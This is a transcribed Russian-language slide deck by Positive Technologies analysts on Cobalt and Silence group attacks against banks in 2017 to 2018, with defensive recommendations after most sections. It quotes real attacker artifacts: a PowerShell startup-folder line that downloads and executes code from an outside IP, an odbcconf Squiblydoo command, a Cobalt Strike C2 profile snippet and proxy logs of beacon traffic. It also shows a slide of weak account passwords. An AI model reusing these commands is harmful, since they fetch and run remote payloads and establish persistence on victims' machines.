Денис Кувшинов, Александр Григорян · 2018-04-06 · cobalt timeline...
TRANSCRIPT
![Page 1: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/1.jpg)
ptsecurity.com
Исследование целенаправленных атакна финансовые организации
Денис Кувшинов, Александр Григорян
Специалисты Expert Security Center
![Page 2: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/2.jpg)
Содержание
Общая структура целенаправленных атак на финансовые организации
Анализ целенаправленных атак за 2017 – начало 2018 гг. на примере групп Cobalt и Silence
Анализ тактик, методов проникновения и используемых инструментов
Рекомендации по предотвращению угроз на каждом этапе атаки
![Page 3: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/3.jpg)
Информация в СМИ
![Page 4: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/4.jpg)
Статистика целенаправленных атак
Подробнее: ptsecurity.com/upload/corporate/ru-ru/analytics/Cybersecurity-threatscape-2017-rus.pdf
![Page 5: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/5.jpg)
Общая структура целенаправленной атаки
Подготовка к атаке
Реализация
атаки
Вывод средств
Компрометация сети
и развитие атаки
Подробнее: habrahabr.ru/company/pt/blog/335826/
![Page 6: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/6.jpg)
Подготовка к атаке
Сбор информации Подготовка ВПО:
• Выбор метода
доставки
• Покупка «крипта»
• Проверка в
приватных
песочницах
Подготовка контрольного сервера:
• Регистрация
фишингового(-ых)
домена(-ов)
• Получение IP-адреса
• Запуск необходимого
софта
Подробнее: habrahabr.ru/company/pt/blog/335826/
![Page 7: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/7.jpg)
Предотвращение атаки
Cyber Threat Intelligence – проактивное реагирование на угрозы.
billing-megafon.ru
billing-mts.ru
billing-beeline.ru
Поиск похожих доменов
Анализ WHOIS данных
Anton0*****@mail.ru
![Page 8: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/8.jpg)
Реализация атаки
Supply chain attack
C2 connection C2 connection
Spear phishing
![Page 9: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/9.jpg)
Spear Phishing
Внимание!
Хакеры атакуют банки в нашей стране. Следуйте всем инструкциям,
предоставленным вашим персоналом, чтобы избежать атак.
пароль: банк
![Page 10: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/10.jpg)
Supply Chain Attack
M.E.Doc (NotPetya)
CCleaner
Подробнее об атаке: xakep.ru/2018/03/13/ccleaner-hack-details
![Page 11: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/11.jpg)
Supply chain attack. Cobalt
![Page 12: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/12.jpg)
Antispam bypass и почтовые артефакты
Использование своего почтового сервера
Настройка легитимного SPF
Настройка DKIM
Почтовые артефакты группы Cobalt
![Page 13: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/13.jpg)
Предотвращение компрометации сети
Cobalt CVE-2017-0199 Cobalt CVE-2017-8759 Cobalt CVE-2017-11882
Своевременная установка патчей
Постоянный мониторинг событий в сети
Подписка на рассылку FinCert
Общая осведомленность пользователей сети
Silence malicious CHM-file
Использование локальной песочницы
![Page 14: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/14.jpg)
ptsecurity.ru
Атаки за 2017 — начало 2018 гг.
![Page 15: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/15.jpg)
Cobalt Silence
Среда распространения Финансовые организации и их подрядчики Банки
Вектор проникновения Фишинговые письма
Методы доставкиДокументы с эксплойтами или макросами,
зашифрованные архивы
Документы с эксплойтами,
архивы с LNK-файлами, CHM-файлы
Конструкторы документов
Публичные и приватные конструкторы
(модифицированные),
Microsoft Word Intruder (MWI)
Приватные конструкторы
Полезная нагрузка Cobalt Strike beaconSilence Trojan
Cobalt Strike beacon
Цель атаки Кража денежных средств
«Плохие» парни
![Page 16: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/16.jpg)
Cobalt Silence
Количество обнаруженных атак 43 8
Количество зарегистрированных доменов 71 5
Используемые эксплойты
CVE-2017-0199
CVE-2017-8759
CVE-2017-11882
CVE-2017-0199
CVE-2017-0262
Методы атаки
Spear Phishing
Squiblydoo
Living-Off-The-Land
Spear Phishing
Squiblydoo
Multimodule malware
Статистика по атакам за 2017 – начало 2018 гг.
![Page 17: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/17.jpg)
Cobalt timeline
CVE-2017-0199 FinSpy
ZerodayFirst Builder
First Cobalt attack CVE-2017-0199
MWI builder with CVE-2017-0199
Evolution of attack with CVE-2017-
0199
CVE-2017-8759 FinSpy
ZerodayFirst Builder
First Cobalt attack CVE-2017-8759
CVE-2017-11882
discovered
CVE-2017-11882 POC
First Cobalt attack CVE-2017-11882
8 апреля
17 апреля
24 апреля
17 мая
17 июля 14 сентября
12 сентября 20 сентября 29 ноября
14 ноября 29 ноября
![Page 18: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/18.jpg)
Интересные факты о Cobalt
Среднее время между регистрацией фишингового домена и атакой – 2 дня
Не любят Лабораторию Касперского
Среднее время до вывода средств – 1 месяц
Время от проникновения до полной компрометации сети: от нескольких часов до недели
![Page 19: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/19.jpg)
Cobalt и Petya
C# executable
Раскодирование powershell web-downloader и загрузка Cobalt-Strike dll-Beacon
![Page 20: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/20.jpg)
Схема CVE-2017-0199
Сервер
злоумышленника
Сервер
злоумышленника
Удаленный сервер
Жертва
Жертва
Удаленный сервер
Доставка вредоносного .rtf документа
Генерация .rtf документа
Жертва открывает
вредоносный .rtf
GET-запрос на удаленный OLE-объект
Доставка HTA-файла
Уязвимый Word исполняет
доставленный HTA-файл
HTA-файл, с помощью Powershell, загружает и
исполняет Payload с удаленного сервера
GET-запрос для загрузки Payload
Доставка Payload на машину жертвы
![Page 21: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/21.jpg)
Пример простого HTA-файла
![Page 22: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/22.jpg)
Пример сложного HTA-файла (MWI)
![Page 23: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/23.jpg)
Загрузка Beacon
![Page 24: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/24.jpg)
Обфускация скачиваемого HTA-скрипта
Применение AES-256 для шифрования stage 2
Использование метода Living-off-the-land и Squiblydoo
Загрузка нового JS-бэкдора
Эволюция применения экплойта CVE-2017-0199
![Page 25: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/25.jpg)
Обфусцированный HTA-скрипт
Заглушка
Загрузка зашифрованного AES-256 2-stage и его расшифровка
![Page 26: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/26.jpg)
Living-off-the-land и Squiblydoo
odbcconf.exe /S /A {REGSVR C:\Users\Administrator\AppData\Roaming\46572.txt}
![Page 27: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/27.jpg)
JS-бэкдор
Возможности:
RC4 Encryption
Получение обновлений
Операции с файлами
Сбор информации о системе
Получение команд
![Page 28: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/28.jpg)
Схема CVE-2017-8759
Сервер
злоумышленника
Сервер
злоумышленника
Удаленный сервер
Жертва
Жертва
Удаленный сервер
Доставка вредоносного .rtf документа
Генерация .rtf документа
Жертва открывает
вредоносный .rtf
GET-запрос на удаленный SOAP WSDL
Доставка SOAP WSDL файла
Внедрение SOAP содержимого в
уязвимый WSDL парсер
Генерация и компиляция исходного кода с помощью
csc.exe .NET framework в DLL. Microsoft Office загружает
библиотеку и исполняет stage
GET-запрос для загрузки Payload
Доставка Payload на машину жертвы
![Page 29: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/29.jpg)
Получение WSDL SOAP файла
![Page 30: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/30.jpg)
Получение Cobalt Strike dll-beacon
Injected code in Microsoft OfficeИсполнение PowerShell web-downloader
![Page 31: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/31.jpg)
Схема CVE-2017-11882
Rtf документ
Equation Native Stream
Embedded Ole-object
EQNEDT32.EXE
Malicious code in
MTEF data.
Vulnerability in
Font Record
Remote Code Execution
Buffer overflow.
Control flow to WinExec.
![Page 32: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/32.jpg)
Cobalt CVE-2017-11882
Использование уязвимости через несколько часов после опубликования POC
Cobalt CVE-2017-11882
![Page 33: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/33.jpg)
Cobalt 2018
Смена метода доставки
Новые техники проникновения
Комбинация техник проникновения
Модификация старого пакера
Новый конструктор для документов
Раскодирование
Payload
Скачивание Payload
Новый Shellcode
Использование CVE-2018-0802
![Page 34: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/34.jpg)
Cobalt custom packer
2017 Version 2018 Version
![Page 35: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/35.jpg)
Silence timeline
CVE-2017-
0199 FinSpyZeroday
FirstBuilder
First Silence attack
CVE-2017-0199
Squiblydoo
Malicious LNK
Malicious LNK
CVE-2017-0199
CVE 2017-0262
Malicious CHM-file
8 апреля
17 апреля
20 апреля
11 мая
15 июня
9 августа
13 октября
APT28 CVE-
2017-0262
Zeroday
19 апреля
![Page 36: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/36.jpg)
Примеры писем Silence
![Page 37: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/37.jpg)
Интересные факты о Silence
Использование публичных почтовых сервисов
Не любят Лабораторию Касперского
Использование более продвинутых способов проникновения
Любят Slipknot
Рассылки от имен несуществующих банков
![Page 38: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/38.jpg)
Multimodule Silence APT trojan
Silence main dropper
Control module
Screenshot gathering module
Hardcoded Pipe
Backconnect moduleCommands:
• Htrjyytrn (реконнект)
• Htcnfhn (рестарт)
• Ytnpflfybq (нет заданий)
SOCKS proxy module
![Page 39: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/39.jpg)
Silence main dropper
![Page 40: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/40.jpg)
Silence LNK-Squiblydoo
LNK
Cobalt Strike VBS-Scriplet Cobalt Strike Beacon
![Page 41: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/41.jpg)
(OFF TOP) APT-28 Zeroday exploits
CVE-2017-0262
CVE-2017-0263
![Page 42: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/42.jpg)
Silence APT28 Exploit (CVE-2017-0262)
CVE-2017-0262 DOCX
FLTLDR.EXE
Inject shellcode
EPS
Silence main dropper
![Page 43: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/43.jpg)
ptsecurity.ru
Получение контроля
![Page 44: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/44.jpg)
Cobalt Strike
Подробнее: cobaltstrike.com
Attacks Packages
HTML Application
MS Office Macro
Payload Generator
USB/CD AutoPlay
Windows Dropper
Windows Executable
Attacks Web Drive-by
Clone Site
Host File
Scripted Web Delivery
Signet Applet Attack
Smart Applet Attack
![Page 45: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/45.jpg)
RAT Beacon
Агент Beacon является основной полезной нагрузкой и представляет из себя ВПО класса RAT (Remote Access Trojan)
Access
Bypass UAC
Dump Hashes
Golden Ticket
Make Token
Run Mimikatz
Spawn AS
Explore
Browser Pivot
Desktop (VNC)
File Browser
Net View
Port Scan
Process List
Screenshot
Login
Psexec
Psexec (psh)
Ssh
Ssh (key)
Winrm (psh)
Wmi (psh)
![Page 46: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/46.jpg)
Связь Beacon с управляющим сервером
GET (Sends MetaData)
GET (Beacon Tasking)
POST (Sends Output from Tasking)
Teamserver Beacon
![Page 47: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/47.jpg)
Beacon Custom Profile
HTTPS Certificate
Global Options
GET/POST
Stager Server
![Page 48: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/48.jpg)
Пример связи Beacon с С2
http-get {
set uri "/ga.js";
client {
metadata {
base64;
prepend "user=";
header "Cookie";
}
}
![Page 49: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/49.jpg)
Beacon Communicate
ISALOG_2017****_WEB_000 (2).w3c: *.*.*.* Domain\User Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1;
Trident/5.0) 2017 **** 06:33:09 PROXY - - 5.154.191.30 443 5725 2555 204566 http GET
http://5.154.191.30:443/Pe3t application/octet-stream Inet 200 Разрешает веб-доступ для всех
пользователей Req ID: 088d95f2 Внутренняя Внешняя 0x480 Allowed - - - - Разрешено
Проверка наличия вредоносных программ отключена Неизвестно - 0 - 0 - *.*.*.* Функция
отключена Отсутствует 5.154.191.30 49599 -
ISALOG_2017****_WEB_000 (2).w3c: *.*.*.* Domain\User Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0; BOIE9;ENUSSEM) 2017 **** 06:33:10 PROXY- - 5.154.191.30 443 156 412 273
http GET http://5.154.191.30:443/ga.js application/octet-stream Inet 200 Разрешает веб-доступ для
всех пользователей Req ID: 088d960b Внутренняя Внешняя 0x480 Allowed - - - -
Разрешено Проверка наличия вредоносных программ отключена Неизвестно - 0 -0 - *.*.*.*
Функция отключена Отсутствует 5.154.191.30 49599 -
ISALOG_2017****_WEB_000 (2).w3c: *.*.*.* Domain\User Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0; BOIE9;ENUSSEM) 2017 **** 06:34:15 PROXY - - 5.154.191.30 443 842 194137 258
http POST http://5.154.191.30:443/submit.php?id=19042 text/html Inet 200 Разрешает веб-
доступ для всех пользователей Req ID: 088d9bbe Внутренняя Внешняя 0x680 Allowed - - - -
Разрешено Проверка наличия вредоносных программ отключена Неизвестно - 0 -0 - *.*.*.*
Функция отключена Отсутствует 5.154.191.30 49599 -
![Page 50: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/50.jpg)
Рекомендации
YARA Scan (Loki: github.com/Neo23x0/Loki)
YARA Rule (github.com/Neo23x0/signature-base/blob/master/yara/crime_cobaltgang.yar)
AV (KVRT: kaspersky.ru/downloads/thank-you/free-virus-removal-tool)
IOCs Scan (FinCERT Reports)
IDS/IPS
![Page 51: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/51.jpg)
ptsecurity.ru
Получение привилегий
![Page 52: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/52.jpg)
Повышение привилегий
Pass the hash
Mimikatz
Inject in process
Bypass UAC
GPP Password
![Page 53: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/53.jpg)
GPP Password
![Page 54: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/54.jpg)
Privilege Escalation
![Page 55: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/55.jpg)
True Story
Идентификатор Пароль
NewUser 11111
PrintUser print
Restoremail 123
Admin Vfkbyf
TestUser Test123
TestUserIT testuser
![Page 56: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/56.jpg)
Рекомендации
Создание отдельных учетных записей с
привилегиями доменного администратора
Требования к длине и сложности для пароля
Мониторинг Windows Events
Создание уникальных паролей локальных
администраторов на хостах
Внедрение двухфакторной аутентификации
Устранение уязвимости GPP.
Подробнее: technet.microsoft.com/en-us/library/mt631194(v=ws.11).aspx
![Page 57: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/57.jpg)
ptsecurity.ru
Закрепление в сети и развитие атаки
![Page 58: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/58.jpg)
Закрепление в сети
Startup Folder
Windows Registry
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\startup.bat
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://185.161.208.97:80/a'))"
![Page 59: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/59.jpg)
«Бесфайловая» атака — Poweliks
![Page 60: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/60.jpg)
«Беcфайловая» атака — Silence
![Page 61: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/61.jpg)
«Беcфайловая» атака — Silence
![Page 62: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/62.jpg)
Деобфускация Cobalt Strike Beacon
Stage 1 Base64
Stage 2 Base64
Stage 3 GZIP
Stage 4 Base64 Stage 6 C2, UA, PIPE, URL
Stage 5 ShellCode
